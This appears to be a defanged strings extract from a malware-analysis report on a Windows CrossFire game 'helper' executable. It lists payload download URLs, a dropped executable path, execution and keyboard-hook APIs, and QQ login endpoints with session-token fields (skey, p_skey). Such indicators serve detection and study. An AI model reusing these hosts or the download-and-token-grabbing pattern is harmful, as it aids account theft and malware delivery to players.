T%Program Files%\NamuADLook.dll
T%Program Files%\NamuADLook.dll
mscoree.dll
mscoree.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
VVV.kubei9.com
1.3.6.1
1.3.6.1
(*.*)
(*.*)
1.0.0.0
1.0.0.0
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0 (xpclient.010817-1148)
6.0.2600.0
6.0.2600.0
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF400-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF401-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF402-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF405-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
{557CF406-1A04-11D3-9A73-0000F81EF32E}
2.6.0.0
2.6.0.0
VVV.cfzhushou.com
VVV.cfzhushou.com
%original file name%.exe_3308_rwx_00401000_004DC000:
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
wininet.dll
wininet.dll
ole32.dll
ole32.dll
kernel32.dll
kernel32.dll
user32.dll
user32.dll
User32.dll
User32.dll
Kernel32.dll
Kernel32.dll
shell32.dll
shell32.dll
gdiplus.dll
gdiplus.dll
GdiPlus.dll
GdiPlus.dll
Ole32.dll
Ole32.dll
OleAut32.dll
OleAut32.dll
oleaut32.dll
oleaut32.dll
gzip.dll
gzip.dll
ntdll.dll
ntdll.dll
gdi32.dll
gdi32.dll
Gdi32.dll
Gdi32.dll
imm32.dll
imm32.dll
OLEACC.DLL
OLEACC.DLL
advapi32.dll
advapi32.dll
shlwapi.dll
shlwapi.dll
atl.dll
atl.dll
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
ShellExecuteA
ShellExecuteA
GetProcessHeap
GetProcessHeap
GetAsyncKeyState
GetAsyncKeyState
GdipSetStringFormatHotkeyPrefix
GdipSetStringFormatHotkeyPrefix
RegisterHotKey
RegisterHotKey
UnregisterHotKey
UnregisterHotKey
GetUrlCacheEntryInfoA
GetUrlCacheEntryInfoA
RegCloseKey
RegCloseKey
RegCreateKeyA
RegCreateKeyA
RegOpenKeyA
RegOpenKeyA
GetWindowsDirectoryA
GetWindowsDirectoryA
GdiplusShutdown
GdiplusShutdown
%d-d-d d:d:d
%d-d-d d:d:d
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
hXXp://cf.ams.game.qq.com/ams/ame/ame.php?ameVersion=0.3&sServiceType=cf&iActivityId=
"sMsg":"
"sMsg":"
https
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
http=
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
hXXps://
hXXps://
hXXp://
hXXp://
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
hXXp://iyouxi.vip.qq.com/ams3.0.php?_c=page&actid=
1970-01-01 08:00:00
1970-01-01 08:00:00
[VVV.111Ttt.com]
[VVV.111Ttt.com]
-URL:
-URL:
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
crossfire.exe
crossfire.exe
MsgBox
MsgBox
SysShadow.SubWnd
SysShadow.SubWnd
\exdui.dll
\exdui.dll
.rsrc
.rsrc
@V.Dv
@V.Dv
.UmKm
.UmKm
4v %u
4v %u
oft.XMLDOMnY
oft.XMLDOMnY
\dwmapi.dll
\dwmapi.dll
A715A0-6587-11D0-924A_20AFC7/
A715A0-6587-11D0-924A_20AFC7/
Leave.CoIn@alize
Leave.CoIn@alize
number is %d.
number is %d.
:"%s"
:"%s"
..0`%X
..0`%X
KERNEL32.DLL
KERNEL32.DLL
ADVAPI32.dll
ADVAPI32.dll
ATL.DLL
ATL.DLL
GDI32.dll
GDI32.dll
MSVCRT.dll
MSVCRT.dll
OLEAUT32.dll
OLEAUT32.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
USER32.dll
USER32.dll
exdui.dll
exdui.dll
t=.VMV
t=.VMV
%%fnW
%%fnW
,7Z.in
,7Z.in
k`%u"]
k`%u"]
T.ZQ2
T.ZQ2
CDKEY
CDKEY
CDKEY:
CDKEY:
ND ED9MS?WC [H6WUiQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WC [H6WUiQ4kU;mX>qN?EJILOPMSFMRSWKEVYGWYW[_bXcI]dV^bciIDeRAbUMeYNkTChVLmZEm\KhYTrNHsYJ{ZTo`LefYir^saKtcTsd\ti[{eTzf]}iV{k]fhhhkqmtfmqsyiewtivxxz}
ND ED9MS?WB [H6WUqN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND ED9MS?WB [H6WUqN?EJILNPMSEMRSVKFVXGVYW[^aXcI]dV]bciIEeSAcVMfZEe[MkTChVLmZEm\JhYTrMGsYJ{ZTeaIgeYir^saKtcTsd\viWui\{eTze]|iU{k\~p_fihhkqlsgmqtyiextjuxxz}
ND EE9LS?WC [I7WTqN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
ND EE9LS?WC [I7WTqN?EJILOPMTDMRSWJE[OTWXFWYWZ^bXcI]dV]bciIEjXEhYUrMGrZIzZTh^aeaIgeYir^saKxgX~p_fhhilrmsgmqtyidslsytjvxxz|
OB EE9LR?WC [I7WTqN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB EE9LR?WC [I7WTqN?EJILOPMTDMRSWIE[OTWXFWYX[^aXcI]dV]bciJEjXEhYUrNGr[IzZTh^bfaIgdYir^saKxgX~p_fhhjlrmsgmqtyidslsysjvxxz|
OB FE9KR?WC [I7WTqN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
OB FE9KR?WC [I7WTqN?EJIKOPMTDMRSWIE\ORWXFWYX[^aXcI]dV]bciJEjXEhYUrNHr[IzZTh^bfaIhdYir^saKxgX~p_fhhjlrmsgnrtyjeslsysjvxxz|
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
MB,EE9KR?WC [I7WT
wW.Gg
wW.Gg
NA EE9KR?WC [I7WT
NA EE9KR?WC [I7WT
NA FE9KR?WC [I7WT
NA FE9KR?WC [I7WT
Z|.Gw
Z|.Gw
MA,FE9KR?WC*[I7WT
MA,FE9KR?WC*[I7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,EE9KR?WC*ZI7WT
MA,EE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
NA,FE9KR?WC*ZI7WT
l.er;
l.er;
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
8`!%x
8`!%x
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC*ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WT
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVqNIr\IyZTg^bfaIidXir_saJwgXzr^fhhkmrnqinrtyjerlszsivxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhYVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
MA,FE9KR?WC ZI7WTqN?EJIKOPMUCMRRWHE[NSWWFWYXZ^aXcI]eU]bciJE`ORcOQjXEhZVrNIr\IyZTg^bfaIidXir_saJwgXyr^fhhkmrnqinrtyjerlszshvxyz|
.pQ\ a
.pQ\ a
.NaH-*
.NaH-*
!)!!))!)-*1-(333:73_
!)!!))!)-*1-(333:73_
%XE%Z
%XE%Z
dj%d~
dj%d~
.PXF3
.PXF3
02/24/16
02/24/16
%UD-Od
%UD-Od
lI*wt.KK
lI*wt.KK
%4u3\2t
%4u3\2t
W.ctn
W.ctn
.yEXjmS
.yEXjmS
Yn7%X
Yn7%X
..RZd
..RZd
A$#%DR
A$#%DR
Wx.xlu
Wx.xlu
n.mJ~f#
n.mJ~f#
Il%UVl_
Il%UVl_
.mDB`
.mDB`
.ijWU5
.ijWU5
w%SY
w%SY
Wkbn%X
Wkbn%X
kEYH
kEYH
&.kPd
&.kPd
(s.PKL
(s.PKL
>%fZM
>%fZM
T2%xE
T2%xE
dQ]%U
dQ]%U
#.mkTSx
#.mkTSx
.Ag.~
.Ag.~
%f%%f
%f%%f
7".Fv
7".Fv
>.OsM
>.OsM
r.vDO
r.vDO
V2.6.0
V2.6.0
\CF_data.ini
\CF_data.ini
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://q.qlogo.cn/headimg_dl?bs=qq&dst_uin=
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://blog.163.com/leesin_2017/blog/static/2672760322016102115848934/
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://note.youdao.com/yws/public/note/9eecf8d4c685cad98cef71bfc32bee84?keyfrom=public
hXXp://xinzyw.com/cf.txt
hXXp://xinzyw.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://cfzhushou.com/cf.txt
hXXp://VVV.cfzhushou.com
hXXp://VVV.cfzhushou.com
.text
.text
`.rdata
`.rdata
@.data
@.data
CF_Helper.dll
CF_Helper.dll
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
hXXp://baike2016.blog.163.com/blog/static/26993501420171281319931/
\CF_Helper.dll
\CF_Helper.dll
@.reloc
@.reloc
%Program Files%\sesvcs_%d_56089.exe
%Program Files%\sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
sesvcs_%d_56089.exe
hXXp://down.9udn.com/aload/as/33.txt
hXXp://down.9udn.com/aload/as/33.txt
%Program Files%\23.txt
%Program Files%\23.txt
%Program Files%\NamuADLook.dll
%Program Files%\NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
hXXp://xzdownad.zglhsw.com/aload/cp/NamuADLook.dll
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
operator
operator
GetProcessWindowStation
GetProcessWindowStation
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
C:\Users\Administrator\Documents\Tencent Files\1148797355\FileRecv\DLL
\xxx\Helper.pdb
\xxx\Helper.pdb
Helper.dll
Helper.dll
KERNEL32.dll
KERNEL32.dll
InternetCrackUrlA
InternetCrackUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
GetCPInfo
GetCPInfo
zcÃ
zcÃ
true
true
7.84888
7.84888
6 696?6{6
6 696?6{6
14686
14686
5 5(50585
5 5(50585
? ?$?,?@?`?
? ?$?,?@?`?
>$>0>4>8>
>$>0>4>8>
%d&&'
%d&&'
123456789
123456789
00003333
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
F%*.*f
F%*.*f
CNotSupportedException
CNotSupportedException
commctrl_DragListMsg
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
Afx:%x:%x
COMCTL32.DLL
COMCTL32.DLL
CCmdTarget
CCmdTarget
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
iphlpapi.dll
iphlpapi.dll
MPR.dll
MPR.dll
WINMM.dll
WINMM.dll
WS2_32.dll
WS2_32.dll
VERSION.dll
VERSION.dll
WinExec
WinExec
GetKeyState
GetKeyState
GetViewportOrgEx
GetViewportOrgEx
WINSPOOL.DRV
WINSPOOL.DRV
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
COMCTL32.dll
COMCTL32.dll
CreateDialogIndirectParamA
CreateDialogIndirectParamA
UnhookWindowsHookEx
UnhookWindowsHookEx
SetWindowsHookExA
SetWindowsHookExA
SetViewportOrgEx
SetViewportOrgEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
SetViewportExtEx
ScaleViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
GetViewportExtEx
comdlg32.dll
comdlg32.dll
.PAVCException@@
.PAVCException@@
Shell32.dll
Shell32.dll
Mpr.dll
Mpr.dll
Advapi32.dll
Advapi32.dll
(&07-034/)7 '
(&07-034/)7 '
?? / %d]
?? / %d]
%d / %d]
%d / %d]
.PAVCFileException@@
.PAVCFileException@@
: %d]
: %d]
(*.*)|*.*||
(*.*)|*.*||
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.txt)|*.txt|
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
(*.PNG)|*.PNG|BMP
(*.BMP)|*.BMP|GIF
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
(*.CUR)|*.CUR|
%s:%d
%s:%d
windows
windows
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
out.prn
out.prn
(*.prn)|*.prn|
(*.prn)|*.prn|
%d.%d
%d.%d
%d/%d
%d/%d
1.6.9
1.6.9
unsupported zlib version
unsupported zlib version
png_read_image: unsupported transformation
png_read_image: unsupported transformation
%d / %d
%d / %d
Bogus message code %d
Bogus message code %d
libpng error: %s
libpng error: %s
libpng warning: %s
libpng warning: %s
1.1.3
1.1.3
bad keyword
bad keyword
libpng does not support gamma background rgb_to_gray
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
Palette is NULL in indexed image
(%d-%d):
(%d-%d):
%ld%c
%ld%c
.PAVCObject@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
#include "l.chs\afxres.rc" // Standard components
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
PADPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDD:\
01/04/17
01/04/17
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&s_url=http://cf.qq.com/comm-htdocs/login/logincallback.htm&f_url=&ptlang=2052&ptredirect=100&aid=21000124&daid=8&j_later=0&low_login_hour=0®master=0&pt_login_type=1&pt_aid=0&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&service=login&nodirect=0&ptsigx=
&service=login&nodirect=0&ptsigx=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
hXXp://ptlogin4.game.qq.com/check_sig?pttype=1&uin=
p_skey=
p_skey=
skey=
skey=
szNick_name=
szNick_name=
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://cdn.tgp.qq.com/cf/v3/images/level/BigClass_
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://VVV.51.la/report/1_main_online.asp?id=18855916
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/count2/count.asp?id=85436&sx=1&ys=43
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://count.knowsky.com/img/(.*?)/(.*?).gif
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/comm-cgi-bin/content_admin/activity_center/query_role.cgi?game=cf&area=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
hXXp://apps.game.qq.com/cf/a20141126main/getUserInfo.php?action=initQuery&sArea=
tEXtXML:com.adobe.xmp
tEXtXML:com.adobe.xmp
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
Adobe Photoshop CC (Windows)
Adobe Photoshop CC (Windows)
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
/* |xGv00|13a28bd5e87728de7241d2f04c3c02f5 */hXXp://apps.game.qq.com/cgi-bin/cf/cfvip/checkCFvipStatue.cgi?rd=0.3552593735512346&_=1459778886737
msg":"
msg":"
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/cf/cfvip/doCfVip.php?action=getCfVipInfo&rd=0.16843547895445687&_=1459479795992
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
hXXp://apps.game.qq.com/php/tgclub/v2/user/logininfo?callback=jQuery17209628733010031283_1459773913284&_=1459773913464
ÿF8>NFFFh
ÿF8>NFFFh
ÿFV
ÿFV
,.Ey)
,.Ey)
qTcp,
qTcp,
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
hXXp://wpa.qq.com/msgrd?v=3&uin=138417120&site=qq&menu=yes
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
&appid=15000103&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&r=0.15214470936916769
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
&pt_randsalt=0&ptredirect=1&u1=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=2-6-1461659794871&js_ver=10153&js_type=1&login_sig=0nLadn6F*IOLoKBk7n-g3iCxqdCGPSIeyZhV-iaDTmCcf6BeP3DeVa3TGrAvmDod&pt_uistyle=20&aid=15000103&daid=5&
hXXp://ptlogin2.qq.com/login?u=
hXXp://ptlogin2.qq.com/login?u=
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
&s_url=http://act.qzone.qq.com/meteor/pc/index.html?rid=998=1000&e_code=224288?ADTAG=bangbang.hdsq&f_url=&ptlang=2052&ptredirect=100&aid=1000101&daid=5&j_later=0&low_login_hour=0®master=0&pt_login_type=2&pt_aid=15000103&pt_aaid=0&pt_light=0&pt_3rd_aid=0
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
hXXp://ptlogin4.qzone.qq.com/check_sig?pttype=2&uin=
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2hex(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
return binl2str(core_md5(str2binl(s), s.length * chrsz))
function hex_hmac_md5(key, data) {
function hex_hmac_md5(key, data) {
return binl2hex(core_hmac_md5(key, data))
return binl2hex(core_hmac_md5(key, data))
function b64_hmac_md5(key, data) {
function b64_hmac_md5(key, data) {
return binl2b64(core_hmac_md5(key, data))
return binl2b64(core_hmac_md5(key, data))
function str_hmac_md5(key, data) {
function str_hmac_md5(key, data) {
return binl2str(core_hmac_md5(key, data))
return binl2str(core_hmac_md5(key, data))
for (var i = 0; i
for (var i = 0; i
function core_hmac_md5(key, data) {
function core_hmac_md5(key, data) {
var bkey = str2binl(key);
var bkey = str2binl(key);
if (bkey.length > 16) {
if (bkey.length > 16) {
bkey = core_md5(bkey, key.length * chrsz)
bkey = core_md5(bkey, key.length * chrsz)
ipad[i] = bkey[i] ^ 909522486;
ipad[i] = bkey[i] ^ 909522486;
opad[i] = bkey[i] ^ 1549556828
opad[i] = bkey[i] ^ 1549556828
var hash = core_md5(ipad.concat(str2binl(data)), 512 data.length * chrsz);
var hash = core_md5(ipad.concat(str2binl(data)), 512 data.length * chrsz);
return core_md5(opad.concat(hash), 512 128)
return core_md5(opad.concat(hash), 512 128)
for (var i = 0; i
for (var i = 0; i
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask)
bin[i >> 5] |= (str.charCodeAt(i / chrsz) & mask)
for (var i = 0; i
for (var i = 0; i
str = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
str = String.fromCharCode((bin[i >> 5] >>> (i % 32)) & mask)
for (var i = 0; i
for (var i = 0; i
str = hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8 4)) & 15) hex_tab.charAt((binarray[i >> 2] >> ((i % 4) * 8)) & 15)
